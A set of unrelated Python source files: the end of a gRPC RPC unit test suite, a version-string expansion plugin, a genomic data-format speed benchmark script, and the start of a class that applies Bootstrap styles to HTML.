'testkey',
'testvalue',
),))
def handle_stream_unary(self, request_iterator, servicer_context):
if servicer_context is not None:
servicer_context.invocation_metadata()
self._control.control()
response_elements = []
for request in request_iterator:
self._control.control()
response_elements.append(request)
self._control.control()
if servicer_context is not None:
servicer_context.set_trailing_metadata(((
'testkey',
'testvalue',
),))
return b''.join(response_elements)
def handle_stream_stream(self, request_iterator, servicer_context):
self._control.control()
if servicer_context is not None:
servicer_context.set_trailing_metadata(((
'testkey',
'testvalue',
),))
for request in request_iterator:
self._control.control()
yield request
self._control.control()
class _MethodHandler(grpc.RpcMethodHandler):
def __init__(self, request_streaming, response_streaming,
request_deserializer, response_serializer, unary_unary,
unary_stream, stream_unary, stream_stream):
self.request_streaming = request_streaming
self.response_streaming = response_streaming
self.request_deserializer = request_deserializer
self.response_serializer = response_serializer
self.unary_unary = unary_unary
self.unary_stream = unary_stream
self.stream_unary = stream_unary
self.stream_stream = stream_stream
class _GenericHandler(grpc.GenericRpcHandler):
def __init__(self, handler):
self._handler = handler
def service(self, handler_call_details):
if handler_call_details.method == _UNARY_UNARY:
return _MethodHandler(False, False, None, None,
self._handler.handle_unary_unary, None, None,
None)
elif handler_call_details.method == _UNARY_STREAM:
return _MethodHandler(False, True, _DESERIALIZE_REQUEST,
_SERIALIZE_RESPONSE, None,
self._handler.handle_unary_stream, None, None)
elif handler_call_details.method == _STREAM_UNARY:
return _MethodHandler(True, False, _DESERIALIZE_REQUEST,
_SERIALIZE_RESPONSE, None, None,
self._handler.handle_stream_unary, None)
elif handler_call_details.method == _STREAM_STREAM:
return _MethodHandler(True, True, None, None, None, None, None,
self._handler.handle_stream_stream)
else:
return None
def _unary_unary_multi_callable(channel):
return channel.unary_unary(_UNARY_UNARY)
def _unary_stream_multi_callable(channel):
return channel.unary_stream(
_UNARY_STREAM,
request_serializer=_SERIALIZE_REQUEST,
response_deserializer=_DESERIALIZE_RESPONSE)
def _stream_unary_multi_callable(channel):
return channel.stream_unary(
_STREAM_UNARY,
request_serializer=_SERIALIZE_REQUEST,
response_deserializer=_DESERIALIZE_RESPONSE)
def _stream_stream_multi_callable(channel):
return channel.stream_stream(_STREAM_STREAM)
class RPCTest(unittest.TestCase):
def setUp(self):
self._control = test_control.PauseFailControl()
self._handler = _Handler(self._control)
self._server = test_common.test_server()
port = self._server.add_insecure_port('[::]:0')
self._server.add_generic_rpc_handlers((_GenericHandler(self._handler),))
self._server.start()
self._channel = grpc.insecure_channel('localhost:%d' % port)
def tearDown(self):
self._server.stop(None)
def testUnrecognizedMethod(self):
request = b'abc'
with self.assertRaises(grpc.RpcError) as exception_context:
self._channel.unary_unary('NoSuchMethod')(request)
self.assertEqual(grpc.StatusCode.UNIMPLEMENTED,
exception_context.exception.code())
def testSuccessfulUnaryRequestBlockingUnaryResponse(self):
request = b'\x07\x08'
expected_response = self._handler.handle_unary_unary(request, None)
multi_callable = _unary_unary_multi_callable(self._channel)
response = multi_callable(
request,
metadata=(('test', 'SuccessfulUnaryRequestBlockingUnaryResponse'),))
self.assertEqual(expected_response, response)
def testSuccessfulUnaryRequestBlockingUnaryResponseWithCall(self):
request = b'\x07\x08'
expected_response = self._handler.handle_unary_unary(request, None)
multi_callable = _unary_unary_multi_callable(self._channel)
response, call = multi_callable.with_call(
request,
metadata=(('test',
'SuccessfulUnaryRequestBlockingUnaryResponseWithCall'),))
self.assertEqual(expected_response, response)
self.assertIs(grpc.StatusCode.OK, call.code())
def testSuccessfulUnaryRequestFutureUnaryResponse(self):
request = b'\x07\x08'
expected_response = self._handler.handle_unary_unary(request, None)
multi_callable = _unary_unary_multi_callable(self._channel)
response_future = multi_callable.future(
request,
metadata=(('test', 'SuccessfulUnaryRequestFutureUnaryResponse'),))
response = response_future.result()
self.assertIsInstance(response_future, grpc.Future)
self.assertIsInstance(response_future, grpc.Call)
self.assertEqual(expected_response, response)
self.assertIsNone(response_future.exception())
self.assertIsNone(response_future.traceback())
def testSuccessfulUnaryRequestStreamResponse(self):
request = b'\x37\x58'
expected_responses = tuple(
self._handler.handle_unary_stream(request, None))
multi_callable = _unary_stream_multi_callable(self._channel)
response_iterator = multi_callable(
request,
metadata=(('test', 'SuccessfulUnaryRequestStreamResponse'),))
responses = tuple(response_iterator)
self.assertSequenceEqual(expected_responses, responses)
def testSuccessfulStreamRequestBlockingUnaryResponse(self):
requests = tuple(
b'\x07\x08' for _ in range(test_constants.STREAM_LENGTH))
expected_response = self._handler.handle_stream_unary(
iter(requests), None)
request_iterator = iter(requests)
multi_callable = _stream_unary_multi_callable(self._channel)
response = multi_callable(
request_iterator,
metadata=(('test',
'SuccessfulStreamRequestBlockingUnaryResponse'),))
self.assertEqual(expected_response, response)
def testSuccessfulStreamRequestBlockingUnaryResponseWithCall(self):
requests = tuple(
b'\x07\x08' for _ in range(test_constants.STREAM_LENGTH))
expected_response = self._handler.handle_stream_unary(
iter(requests), None)
request_iterator = iter(requests)
multi_callable = _stream_unary_multi_callable(self._channel)
response, call = multi_callable.with_call(
request_iterator,
metadata=(
('test',
'SuccessfulStreamRequestBlockingUnaryResponseWithCall'),))
self.assertEqual(expected_response, response)
self.assertIs(grpc.StatusCode.OK, call.code())
def testSuccessfulStreamRequestFutureUnaryResponse(self):
requests = tuple(
b'\x07\x08' for _ in range(test_constants.STREAM_LENGTH))
expected_response = self._handler.handle_stream_unary(
iter(requests), None)
request_iterator = iter(requests)
multi_callable = _stream_unary_multi_callable(self._channel)
response_future = multi_callable.future(
request_iterator,
metadata=(('test', 'SuccessfulStreamRequestFutureUnaryResponse'),))
response = response_future.result()
self.assertEqual(expected_response, response)
self.assertIsNone(response_future.exception())
self.assertIsNone(response_future.traceback())
def testSuccessfulStreamRequestStreamResponse(self):
requests = tuple(
b'\x77\x58' for _ in range(test_constants.STREAM_LENGTH))
expected_responses = tuple(
self._handler.handle_stream_stream(iter(requests), None))
request_iterator = iter(requests)
multi_callable = _stream_stream_multi_callable(self._channel)
response_iterator = multi_callable(
request_iterator,
metadata=(('test', 'SuccessfulStreamRequestStreamResponse'),))
responses = tuple(response_iterator)
self.assertSequenceEqual(expected_responses, responses)
def testSequentialInvocations(self):
first_request = b'\x07\x08'
second_request = b'\x0809'
expected_first_response = self._handler.handle_unary_unary(
first_request, None)
expected_second_response = self._handler.handle_unary_unary(
second_request, None)
multi_callable = _unary_unary_multi_callable(self._channel)
first_response = multi_callable(
first_request, metadata=(('test', 'SequentialInvocations'),))
second_response = multi_callable(
second_request, metadata=(('test', 'SequentialInvocations'),))
self.assertEqual(expected_first_response, first_response)
self.assertEqual(expected_second_response, second_response)
def testConcurrentBlockingInvocations(self):
pool = logging_pool.pool(test_constants.THREAD_CONCURRENCY)
requests = tuple(
b'\x07\x08' for _ in range(test_constants.STREAM_LENGTH))
expected_response = self._handler.handle_stream_unary(
iter(requests), None)
expected_responses = [expected_response
] * test_constants.THREAD_CONCURRENCY
response_futures = [None] * test_constants.THREAD_CONCURRENCY
multi_callable = _stream_unary_multi_callable(self._channel)
for index in range(test_constants.THREAD_CONCURRENCY):
request_iterator = iter(requests)
response_future = pool.submit(
multi_callable,
request_iterator,
metadata=(('test', 'ConcurrentBlockingInvocations'),))
response_futures[index] = response_future
responses = tuple(
response_future.result() for response_future in response_futures)
pool.shutdown(wait=True)
self.assertSequenceEqual(expected_responses, responses)
def testConcurrentFutureInvocations(self):
requests = tuple(
b'\x07\x08' for _ in range(test_constants.STREAM_LENGTH))
expected_response = self._handler.handle_stream_unary(
iter(requests), None)
expected_responses = [expected_response
] * test_constants.THREAD_CONCURRENCY
response_futures = [None] * test_constants.THREAD_CONCURRENCY
multi_callable = _stream_unary_multi_callable(self._channel)
for index in range(test_constants.THREAD_CONCURRENCY):
request_iterator = iter(requests)
response_future = multi_callable.future(
request_iterator,
metadata=(('test', 'ConcurrentFutureInvocations'),))
response_futures[index] = response_future
responses = tuple(
response_future.result() for response_future in response_futures)
self.assertSequenceEqual(expected_responses, responses)
def testWaitingForSomeButNotAllConcurrentFutureInvocations(self):
pool = logging_pool.pool(test_constants.THREAD_CONCURRENCY)
request = b'\x67\x68'
expected_response = self._handler.handle_unary_unary(request, None)
response_futures = [None] * test_constants.THREAD_CONCURRENCY
lock = threading.Lock()
test_is_running_cell = [True]
def wrap_future(future):
def wrap():
try:
return future.result()
except grpc.RpcError:
with lock:
if test_is_running_cell[0]:
raise
return None
return wrap
multi_callable = _unary_unary_multi_callable(self._channel)
for index in range(test_constants.THREAD_CONCURRENCY):
inner_response_future = multi_callable.future(
request,
metadata=(
('test',
'WaitingForSomeButNotAllConcurrentFutureInvocations'),))
outer_response_future = pool.submit(
wrap_future(inner_response_future))
response_futures[index] = outer_response_future
some_completed_response_futures_iterator = itertools.islice(
futures.as_completed(response_futures),
test_constants.THREAD_CONCURRENCY // 2)
for response_future in some_completed_response_futures_iterator:
self.assertEqual(expected_response, response_future.result())
with lock:
test_is_running_cell[0] = False
def testConsumingOneStreamResponseUnaryRequest(self):
request = b'\x57\x38'
multi_callable = _unary_stream_multi_callable(self._channel)
response_iterator = multi_callable(
request,
metadata=(('test', 'ConsumingOneStreamResponseUnaryRequest'),))
next(response_iterator)
def testConsumingSomeButNotAllStreamResponsesUnaryRequest(self):
request = b'\x57\x38'
multi_callable = _unary_stream_multi_callable(self._channel)
response_iterator = multi_callable(
request,
metadata=(('test',
'ConsumingSomeButNotAllStreamResponsesUnaryRequest'),))
for _ in range(test_constants.STREAM_LENGTH // 2):
next(response_iterator)
def testConsumingSomeButNotAllStreamResponsesStreamRequest(self):
requests = tuple(
b'\x67\x88' for _ in range(test_constants.STREAM_LENGTH))
request_iterator = iter(requests)
multi_callable = _stream_stream_multi_callable(self._channel)
response_iterator = multi_callable(
request_iterator,
metadata=(('test',
'ConsumingSomeButNotAllStreamResponsesStreamRequest'),))
for _ in range(test_constants.STREAM_LENGTH // 2):
next(response_iterator)
def testConsumingTooManyStreamResponsesStreamRequest(self):
requests = tuple(
b'\x67\x88' for _ in range(test_constants.STREAM_LENGTH))
request_iterator = iter(requests)
multi_callable = _stream_stream_multi_callable(self._channel)
response_iterator = multi_callable(
request_iterator,
metadata=(('test',
'ConsumingTooManyStreamResponsesStreamRequest'),))
for _ in range(test_constants.STREAM_LENGTH):
next(response_iterator)
for _ in range(test_constants.STREAM_LENGTH):
with self.assertRaises(StopIteration):
next(response_iterator)
self.assertIsNotNone(response_iterator.initial_metadata())
self.assertIs(grpc.StatusCode.OK, response_iterator.code())
self.assertIsNotNone(response_iterator.details())
self.assertIsNotNone(response_iterator.trailing_metadata())
def testCancelledUnaryRequestUnaryResponse(self):
request = b'\x07\x17'
multi_callable = _unary_unary_multi_callable(self._channel)
with self._control.pause():
response_future = multi_callable.future(
request,
metadata=(('test', 'CancelledUnaryRequestUnaryResponse'),))
response_future.cancel()
self.assertTrue(response_future.cancelled())
with self.assertRaises(grpc.FutureCancelledError):
response_future.result()
with self.assertRaises(grpc.FutureCancelledError):
response_future.exception()
with self.assertRaises(grpc.FutureCancelledError):
response_future.traceback()
self.assertIs(grpc.StatusCode.CANCELLED, response_future.code())
def testCancelledUnaryRequestStreamResponse(self):
request = b'\x07\x19'
multi_callable = _unary_stream_multi_callable(self._channel)
with self._control.pause():
response_iterator = multi_callable(
request,
metadata=(('test', 'CancelledUnaryRequestStreamResponse'),))
self._control.block_until_paused()
response_iterator.cancel()
with self.assertRaises(grpc.RpcError) as exception_context:
next(response_iterator)
self.assertIs(grpc.StatusCode.CANCELLED,
exception_context.exception.code())
self.assertIsNotNone(response_iterator.initial_metadata())
self.assertIs(grpc.StatusCode.CANCELLED, response_iterator.code())
self.assertIsNotNone(response_iterator.details())
self.assertIsNotNone(response_iterator.trailing_metadata())
def testCancelledStreamRequestUnaryResponse(self):
requests = tuple(
b'\x07\x08' for _ in range(test_constants.STREAM_LENGTH))
request_iterator = iter(requests)
multi_callable = _stream_unary_multi_callable(self._channel)
with self._control.pause():
response_future = multi_callable.future(
request_iterator,
metadata=(('test', 'CancelledStreamRequestUnaryResponse'),))
self._control.block_until_paused()
response_future.cancel()
self.assertTrue(response_future.cancelled())
with self.assertRaises(grpc.FutureCancelledError):
response_future.result()
with self.assertRaises(grpc.FutureCancelledError):
response_future.exception()
with self.assertRaises(grpc.FutureCancelledError):
response_future.traceback()
self.assertIsNotNone(response_future.initial_metadata())
self.assertIs(grpc.StatusCode.CANCELLED, response_future.code())
self.assertIsNotNone(response_future.details())
self.assertIsNotNone(response_future.trailing_metadata())
def testCancelledStreamRequestStreamResponse(self):
requests = tuple(
b'\x07\x08' for _ in range(test_constants.STREAM_LENGTH))
request_iterator = iter(requests)
multi_callable = _stream_stream_multi_callable(self._channel)
with self._control.pause():
response_iterator = multi_callable(
request_iterator,
metadata=(('test', 'CancelledStreamRequestStreamResponse'),))
response_iterator.cancel()
with self.assertRaises(grpc.RpcError):
next(response_iterator)
self.assertIsNotNone(response_iterator.initial_metadata())
self.assertIs(grpc.StatusCode.CANCELLED, response_iterator.code())
self.assertIsNotNone(response_iterator.details())
self.assertIsNotNone(response_iterator.trailing_metadata())
def testExpiredUnaryRequestBlockingUnaryResponse(self):
request = b'\x07\x17'
multi_callable = _unary_unary_multi_callable(self._channel)
with self._control.pause():
with self.assertRaises(grpc.RpcError) as exception_context:
multi_callable.with_call(
request,
timeout=test_constants.SHORT_TIMEOUT,
metadata=(('test',
'ExpiredUnaryRequestBlockingUnaryResponse'),))
self.assertIsInstance(exception_context.exception, grpc.Call)
self.assertIsNotNone(exception_context.exception.initial_metadata())
self.assertIs(grpc.StatusCode.DEADLINE_EXCEEDED,
exception_context.exception.code())
self.assertIsNotNone(exception_context.exception.details())
self.assertIsNotNone(exception_context.exception.trailing_metadata())
def testExpiredUnaryRequestFutureUnaryResponse(self):
request = b'\x07\x17'
callback = _Callback()
multi_callable = _unary_unary_multi_callable(self._channel)
with self._control.pause():
response_future = multi_callable.future(
request,
timeout=test_constants.SHORT_TIMEOUT,
metadata=(('test', 'ExpiredUnaryRequestFutureUnaryResponse'),))
response_future.add_done_callback(callback)
value_passed_to_callback = callback.value()
self.assertIs(response_future, value_passed_to_callback)
self.assertIsNotNone(response_future.initial_metadata())
self.assertIs(grpc.StatusCode.DEADLINE_EXCEEDED, response_future.code())
self.assertIsNotNone(response_future.details())
self.assertIsNotNone(response_future.trailing_metadata())
with self.assertRaises(grpc.RpcError) as exception_context:
response_future.result()
self.assertIs(grpc.StatusCode.DEADLINE_EXCEEDED,
exception_context.exception.code())
self.assertIsInstance(response_future.exception(), grpc.RpcError)
self.assertIsNotNone(response_future.traceback())
self.assertIs(grpc.StatusCode.DEADLINE_EXCEEDED,
response_future.exception().code())
def testExpiredUnaryRequestStreamResponse(self):
request = b'\x07\x19'
multi_callable = _unary_stream_multi_callable(self._channel)
with self._control.pause():
with self.assertRaises(grpc.RpcError) as exception_context:
response_iterator = multi_callable(
request,
timeout=test_constants.SHORT_TIMEOUT,
metadata=(('test', 'ExpiredUnaryRequestStreamResponse'),))
next(response_iterator)
self.assertIs(grpc.StatusCode.DEADLINE_EXCEEDED,
exception_context.exception.code())
self.assertIs(grpc.StatusCode.DEADLINE_EXCEEDED,
response_iterator.code())
def testExpiredStreamRequestBlockingUnaryResponse(self):
requests = tuple(
b'\x07\x08' for _ in range(test_constants.STREAM_LENGTH))
request_iterator = iter(requests)
multi_callable = _stream_unary_multi_callable(self._channel)
with self._control.pause():
with self.assertRaises(grpc.RpcError) as exception_context:
multi_callable(
request_iterator,
timeout=test_constants.SHORT_TIMEOUT,
metadata=(('test',
'ExpiredStreamRequestBlockingUnaryResponse'),))
self.assertIsInstance(exception_context.exception, grpc.RpcError)
self.assertIsInstance(exception_context.exception, grpc.Call)
self.assertIsNotNone(exception_context.exception.initial_metadata())
self.assertIs(grpc.StatusCode.DEADLINE_EXCEEDED,
exception_context.exception.code())
self.assertIsNotNone(exception_context.exception.details())
self.assertIsNotNone(exception_context.exception.trailing_metadata())
def testExpiredStreamRequestFutureUnaryResponse(self):
requests = tuple(
b'\x07\x18' for _ in range(test_constants.STREAM_LENGTH))
request_iterator = iter(requests)
callback = _Callback()
multi_callable = _stream_unary_multi_callable(self._channel)
with self._control.pause():
response_future = multi_callable.future(
request_iterator,
timeout=test_constants.SHORT_TIMEOUT,
metadata=(('test', 'ExpiredStreamRequestFutureUnaryResponse'),))
with self.assertRaises(grpc.FutureTimeoutError):
response_future.result(
timeout=test_constants.SHORT_TIMEOUT / 2.0)
response_future.add_done_callback(callback)
value_passed_to_callback = callback.value()
with self.assertRaises(grpc.RpcError) as exception_context:
response_future.result()
self.assertIs(grpc.StatusCode.DEADLINE_EXCEEDED, response_future.code())
self.assertIs(grpc.StatusCode.DEADLINE_EXCEEDED,
exception_context.exception.code())
self.assertIsInstance(response_future.exception(), grpc.RpcError)
self.assertIsNotNone(response_future.traceback())
self.assertIs(response_future, value_passed_to_callback)
self.assertIsNotNone(response_future.initial_metadata())
self.assertIs(grpc.StatusCode.DEADLINE_EXCEEDED, response_future.code())
self.assertIsNotNone(response_future.details())
self.assertIsNotNone(response_future.trailing_metadata())
def testExpiredStreamRequestStreamResponse(self):
requests = tuple(
b'\x67\x18' for _ in range(test_constants.STREAM_LENGTH))
request_iterator = iter(requests)
multi_callable = _stream_stream_multi_callable(self._channel)
with self._control.pause():
with self.assertRaises(grpc.RpcError) as exception_context:
response_iterator = multi_callable(
request_iterator,
timeout=test_constants.SHORT_TIMEOUT,
metadata=(('test', 'ExpiredStreamRequestStreamResponse'),))
next(response_iterator)
self.assertIs(grpc.StatusCode.DEADLINE_EXCEEDED,
exception_context.exception.code())
self.assertIs(grpc.StatusCode.DEADLINE_EXCEEDED,
response_iterator.code())
def testFailedUnaryRequestBlockingUnaryResponse(self):
request = b'\x37\x17'
multi_callable = _unary_unary_multi_callable(self._channel)
with self._control.fail():
with self.assertRaises(grpc.RpcError) as exception_context:
multi_callable.with_call(
request,
metadata=(('test',
'FailedUnaryRequestBlockingUnaryResponse'),))
self.assertIs(grpc.StatusCode.UNKNOWN,
exception_context.exception.code())
def testFailedUnaryRequestFutureUnaryResponse(self):
request = b'\x37\x17'
callback = _Callback()
multi_callable = _unary_unary_multi_callable(self._channel)
with self._control.fail():
response_future = multi_callable.future(
request,
metadata=(('test', 'FailedUnaryRequestFutureUnaryResponse'),))
response_future.add_done_callback(callback)
value_passed_to_callback = callback.value()
self.assertIsInstance(response_future, grpc.Future)
self.assertIsInstance(response_future, grpc.Call)
with self.assertRaises(grpc.RpcError) as exception_context:
response_future.result()
self.assertIs(grpc.StatusCode.UNKNOWN,
exception_context.exception.code())
self.assertIsInstance(response_future.exception(), grpc.RpcError)
self.assertIsNotNone(response_future.traceback())
self.assertIs(grpc.StatusCode.UNKNOWN,
response_future.exception().code())
self.assertIs(response_future, value_passed_to_callback)
def testFailedUnaryRequestStreamResponse(self):
request = b'\x37\x17'
multi_callable = _unary_stream_multi_callable(self._channel)
with self.assertRaises(grpc.RpcError) as exception_context:
with self._control.fail():
response_iterator = multi_callable(
request,
metadata=(('test', 'FailedUnaryRequestStreamResponse'),))
next(response_iterator)
self.assertIs(grpc.StatusCode.UNKNOWN,
exception_context.exception.code())
def testFailedStreamRequestBlockingUnaryResponse(self):
requests = tuple(
b'\x47\x58' for _ in range(test_constants.STREAM_LENGTH))
request_iterator = iter(requests)
multi_callable = _stream_unary_multi_callable(self._channel)
with self._control.fail():
with self.assertRaises(grpc.RpcError) as exception_context:
multi_callable(
request_iterator,
metadata=(('test',
'FailedStreamRequestBlockingUnaryResponse'),))
self.assertIs(grpc.StatusCode.UNKNOWN,
exception_context.exception.code())
def testFailedStreamRequestFutureUnaryResponse(self):
requests = tuple(
b'\x07\x18' for _ in range(test_constants.STREAM_LENGTH))
request_iterator = iter(requests)
callback = _Callback()
multi_callable = _stream_unary_multi_callable(self._channel)
with self._control.fail():
response_future = multi_callable.future(
request_iterator,
metadata=(('test', 'FailedStreamRequestFutureUnaryResponse'),))
response_future.add_done_callback(callback)
value_passed_to_callback = callback.value()
with self.assertRaises(grpc.RpcError) as exception_context:
response_future.result()
self.assertIs(grpc.StatusCode.UNKNOWN, response_future.code())
self.assertIs(grpc.StatusCode.UNKNOWN,
exception_context.exception.code())
self.assertIsInstance(response_future.exception(), grpc.RpcError)
self.assertIsNotNone(response_future.traceback())
self.assertIs(response_future, value_passed_to_callback)
def testFailedStreamRequestStreamResponse(self):
requests = tuple(
b'\x67\x88' for _ in range(test_constants.STREAM_LENGTH))
request_iterator = iter(requests)
multi_callable = _stream_stream_multi_callable(self._channel)
with self._control.fail():
with self.assertRaises(grpc.RpcError) as exception_context:
response_iterator = multi_callable(
request_iterator,
metadata=(('test', 'FailedStreamRequestStreamResponse'),))
tuple(response_iterator)
self.assertIs(grpc.StatusCode.UNKNOWN,
exception_context.exception.code())
self.assertIs(grpc.StatusCode.UNKNOWN, response_iterator.code())
def testIgnoredUnaryRequestFutureUnaryResponse(self):
request = b'\x37\x17'
multi_callable = _unary_unary_multi_callable(self._channel)
multi_callable.future(
request,
metadata=(('test', 'IgnoredUnaryRequestFutureUnaryResponse'),))
def testIgnoredUnaryRequestStreamResponse(self):
request = b'\x37\x17'
multi_callable = _unary_stream_multi_callable(self._channel)
multi_callable(
request, metadata=(('test', 'IgnoredUnaryRequestStreamResponse'),))
def testIgnoredStreamRequestFutureUnaryResponse(self):
requests = tuple(
b'\x07\x18' for _ in range(test_constants.STREAM_LENGTH))
request_iterator = iter(requests)
multi_callable = _stream_unary_multi_callable(self._channel)
multi_callable.future(
request_iterator,
metadata=(('test', 'IgnoredStreamRequestFutureUnaryResponse'),))
def testIgnoredStreamRequestStreamResponse(self):
requests = tuple(
b'\x67\x88' for _ in range(test_constants.STREAM_LENGTH))
request_iterator = iter(requests)
multi_callable = _stream_stream_multi_callable(self._channel)
multi_callable(
request_iterator,
metadata=(('test', 'IgnoredStreamRequestStreamResponse'),))
if __name__ == '__main__':
unittest.main(verbosity=2)
```
#### File: buildgen/plugins/expand_version.py
```python
import re
LANGUAGES = [
'core',
'cpp',
'csharp',
'objc',
'php',
'python',
'ruby',
]
class Version:
def __init__(self, s):
self.tag = None
if '-' in s:
s, self.tag = s.split('-')
self.major, self.minor, self.patch = [int(x) for x in s.split('.')]
def __str__(self):
"""Version string in a somewhat idiomatic style for most languages"""
s = '%d.%d.%d' % (self.major, self.minor, self.patch)
if self.tag:
s += '-%s' % self.tag
return s
def pep440(self):
"""Version string in Python PEP440 style"""
s = '%d.%d.%d' % (self.major, self.minor, self.patch)
if self.tag:
# we need to translate from grpc version tags to pep440 version
# tags; this code is likely to be a little ad-hoc
if self.tag == 'dev':
s += '.dev0'
elif len(self.tag) >= 3 and self.tag[0:3] == 'pre':
s += 'rc%d' % int(self.tag[3:])
else:
raise Exception(
'Don\'t know how to translate version tag "%s" to pep440' %
self.tag)
return s
def ruby(self):
"""Version string in Ruby style"""
if self.tag:
return '%d.%d.%d.%s' % (self.major, self.minor, self.patch,
self.tag)
else:
return '%d.%d.%d' % (self.major, self.minor, self.patch)
def php(self):
"""Version string for PHP PECL package"""
s = '%d.%d.%d' % (self.major, self.minor, self.patch)
if self.tag:
if self.tag == 'dev':
s += 'dev'
elif len(self.tag) >= 3 and self.tag[0:3] == 'pre':
s += 'RC%d' % int(self.tag[3:])
else:
raise Exception(
'Don\'t know how to translate version tag "%s" to PECL version'
% self.tag)
return s
def php_stability(self):
"""stability string for PHP PECL package.xml file"""
if self.tag:
return 'beta'
else:
return 'stable'
def php_composer(self):
"""Version string for PHP Composer package"""
return '%d.%d.%d' % (self.major, self.minor, self.patch)
def mako_plugin(dictionary):
"""Expand version numbers:
- for each language, ensure there's a language_version tag in
settings (defaulting to the master version tag)
- expand version strings to major, minor, patch, and tag
"""
settings = dictionary['settings']
master_version = Version(settings['version'])
settings['version'] = master_version
for language in LANGUAGES:
version_tag = '%s_version' % language
if version_tag in settings:
settings[version_tag] = Version(settings[version_tag])
else:
settings[version_tag] = master_version
``` |
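A quick usage sketch (not part of the plugin itself) of the Version class defined above, showing how one grpc-style version string is rendered in the different package-manager styles. It assumes the module is importable as expand_version; the version values are arbitrary.

```python
# Hypothetical demo of the Version class above; assumes the file is importable
# as `expand_version` and uses made-up version strings.
from expand_version import Version
v = Version('1.19.0-pre2')      # grpc-style version with a prerelease tag
print(str(v))                   # -> 1.19.0-pre2
print(v.pep440())               # -> 1.19.0rc2  (PEP 440 release candidate)
print(v.ruby())                 # -> 1.19.0.pre2
print(v.php())                  # -> 1.19.0RC2
print(v.php_stability())        # -> beta      (any tag is treated as pre-release)
stable = Version('1.19.0')
print(stable.pep440())          # -> 1.19.0
print(stable.php_stability())   # -> stable
```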
{
"source": "4d105s25p3/ibrowser2",
"score": 2
} |
#### File: 4d105s25p3/ibrowser2/speed_test.py
```python
import time
import random
import numpy
import read_data as rd
from timer import test_records, test_timer
from sys import argv
error = "Invaild input, see usage below"
usage = "Usage: speed_test.py [option] fileType dataFile testFile [dataTable]"
option_list = "Options: --best-chrom --P[number of process]"
error_file_type = "Unknown file type"
file_type = "Support File Type: --tabix --bigBed --bigWig. Data table file must be provided at last if type is tabix"
def main(args):
if args[1].startswith('--'):
options = args[0].strip().split("--")
print(options)
args = args[1:]
else:
options = []
data_type, data_file, test_file = args[:3]
num_of_process = 1
if options:
for option in options:
if "P" in option:
num_of_process = int(option.partition("=")[2])
if num_of_process > 1 and data_type != "--bigWig":
print("Error: Only bigWig format supports multi-process mode!")
exit(1)
data_table = None
if data_type == '--tabix':
data_table = args[3]
tests = []
with open(test_file, 'r') as inf:
inf.readline()
for line in inf:
line = line.strip()
if not line: continue
items = line.split('\t')
test = {'nSamples': int(items[0]), 'Length': int(items[1]), 'nBlocks': int(items[2]), 'Ref': items[3], 'Times': int(items[4])}
tests.append(test)
test_folder = test_file.rpartition('/')[0]
test_file_name = test_file.rpartition('/')[2]
res_file = test_folder + '/' + test_file_name.replace(".test", "") + '.result'
for i in tests: print(i)
if data_type == '--tabix':
data = rd.Tabix(data_file, data_table)
elif data_type == '--bigBed':
data = rd.BigBed(data_file)
elif data_type == '--bigWig':
data = rd.BigWig(data_file)
else:
print(error_file_type)
print(file_type)
exit(1)
chrom_sizes = data.chroms
output = "Test for Database: {}\nTest Options: {} {}\n\n".format(data_file, data_type, " ".join(options))
for test in tests:
data.switch_ref(test['Ref'])
for i in range(test['Times']):
if "best-chrom" in options:
chroms = list(chrom_sizes.items()) # [('chr1', 3000), ('chr2', 7200), ...]
available_chrom = [x for x in chroms if x[1] >= test['Length']]
if not available_chrom:
chrom = max(chroms, key = lambda x: x[1])[0]
else:
chrom = random.choice([x[0] for x in available_chrom])
else:
chrom = random.choice(list(chrom_sizes.keys()))
samples = random.sample(data.available_samples, test['nSamples'])
len_chrom = chrom_sizes[chrom]
if test['Length'] > len_chrom:
test['Length'] = len_chrom
print("WARNING: Length of target sequence has been cut to {}".format(test['Length']))
start = random.randrange(1, len_chrom - test['Length'] + 2)
end = start + test['Length'] - 1
if data_type == "--bigWig":
temp = data.get(test['nBlocks'], chrom, samples, start = start, end = end, processes = num_of_process)
# temp = another_test_timer(data.get_singleprocess, test['nBlocks'], chrom, samples, start = start, end = end)
else:
temp = data.get(test['nBlocks'], chrom, samples, start = start, end = end)
# temp = another_test_timer(data.get, test['nBlocks'], chrom, samples, start = start, end = end)
condition = "nSamples {} Length {} nBlocks {} Ref {} Times {}\n".format(test['nSamples'], test['Length'], test['nBlocks'], test['Ref'], test['Times'])
output += condition
output += "timer\tAverage\tStd\n"
print("\nResults for Test Condition: \n{}\n".format(test))
timer_list = ['sys', 'user', 'process', 'total']
for timer in timer_list:
print(timer)
raw = ','.join(["{:.4f}".format(x) for x in test_records[timer]])
average = numpy.mean(test_records[timer])
std = numpy.std(test_records[timer])
print("raw: {}".format(raw))
print("average: {:.4f}\n".format(average))
output += "{}\t{:.4f}\t{:.4f}\n".format(timer, average, std)
test_records[timer].clear()
output += '\n'
with open (res_file, 'w') as f:
f.write(output)
if __name__ == '__main__':
if len(argv) > 6 or len(argv) < 4:
print(error)
print(usage)
print(option_list)
print(file_type)
else:
main(argv[1:])
``` |
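For reference, a minimal sketch (not from the repository) of the tab-separated .test file that main() above expects: one header line, then one row per test condition with integer nSamples, Length, nBlocks and Times and a string Ref. The file name and values below are made up.

```python
# Writes a hypothetical example.test file in the layout parsed by main() above.
rows = [
    ("nSamples", "Length", "nBlocks", "Ref", "Times"),  # header line; main() skips it
    (10, 100000, 50, "ref1", 3),                        # made-up test conditions
    (50, 1000000, 200, "ref1", 3),
]
with open("example.test", "w") as f:
    for row in rows:
        f.write("\t".join(str(x) for x in row) + "\n")
```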
{
"source": "4d11/csskrt-csskrt",
"score": 2
} |
#### File: csskrt/scripts/bootstrapCsskrt.py
```python
from bs4 import Tag
from .csskrt import Csskrt
class BootstrapCsskrt(Csskrt):
def __init__(self, fileName):
tag_styles = {
'input': 'form-control',
'select': 'custom-select',
'button': 'btn btn-primary',
'checkbox': 'form-check-input',
'radio': 'form-check-input',
}
super().__init__(fileName, tag_styles)
def version(self):
return "v4.1"
def get_starter_tags(self):
charset_meta = self.soup.new_tag(
'meta', charset='utf-8'
)
        # hack: 'name' is reserved (it is the tag-name parameter of new_tag), so build the Tag directly
viewport_meta = Tag(
builder=self.soup.builder,
name='meta',
attrs={'name': "viewport", 'content': 'width=device-width, initial-scale=1, shrink-to-fit=no'}
)
stylesheet = self.soup.new_tag(
'link',
rel='stylesheet',
href='https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css',
integrity='<KEY>',
crossorigin='anonymous'
)
return [charset_meta, viewport_meta, stylesheet]
def get_wrapper_tag(self):
div = self.soup.new_tag(
